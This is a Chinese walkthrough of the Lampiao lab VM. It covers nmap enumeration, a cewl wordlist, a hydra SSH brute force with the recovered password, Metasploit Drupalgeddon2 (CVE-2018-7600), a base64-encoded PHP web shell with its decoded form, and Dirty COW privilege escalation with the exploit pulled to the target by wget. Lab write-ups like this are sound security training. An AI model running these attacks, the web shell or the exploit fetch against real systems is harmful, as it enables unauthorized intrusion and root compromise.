2-Lampiao

Lampiao

该文章参考大余每日一攻防

1.nmap信息收集

└─$ nmap  192.168.225.138 -p-
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port

2.网页信息枚举?q=node/2发现audio.m4a获得用户名

3.御剑遍历目录

在robots.txt中的CHANGELOG.txt文件发现cns版本为Drupal 7.54。

4.获得密码字典

使用 cewl http://192.168.225.138:1898/?q=node/1 -w lampiao.txt

5.hydra爆破获得密码

hydra -l tiago -P lampiao.txt 192.168.225.138 ssh
host: 192.168.225.138 login: tiago password: Virgulino

6.登录后发现低权限

ssh tiago@192.168.225.138

7.mfs-getshell

搜索关于Drupal 7.54 的利用
msfconsole
search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.225.138
set rpost 1898
run
shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’

8.脏牛漏洞提权

searchsploit dirty
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/Desktop
主机搭建 :python3 -m http.server 8081
靶机下载 :wget http://192.168.225.129:8081/40847.cpp
编译执行:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirty 40847.cpp -lutil
获得密码:Root password is: dirtyCowFun
登录cat ./flag.txt 获得密码:9740616875908d91ddcdaa8aea3af366

9.xray扫描结果获得poc、

给出了两个poc链接,下载后安装执行

sudo gem install highline
./drupalgeddon2.rb http://10.211.55.9:1898/
{
  "create_time": 1737269816952,
  "detail": {
    "addr": "http://192.168.225.138:1898/",
    "payload": "",
    "extra": {
      "links": [
        "https://github.com/dreadlocked/Drupalgeddon2", poc链接
        "https://paper.seebug.org/567/"
      ],
      "param": {}
    }
  },
  "plugin": "poc-yaml-drupal-cve-2018-7600-rce",
  "target": {
    "url": "http://192.168.225.138:1898/"
  },
  "id": 0
}

通过base64方法上传shell.php成功获得shell!

*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------

10.漏洞总结

CVE-2018-7600
Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。
Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。


CVE-2016-5195 脏牛漏洞
Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。

.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。
``

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值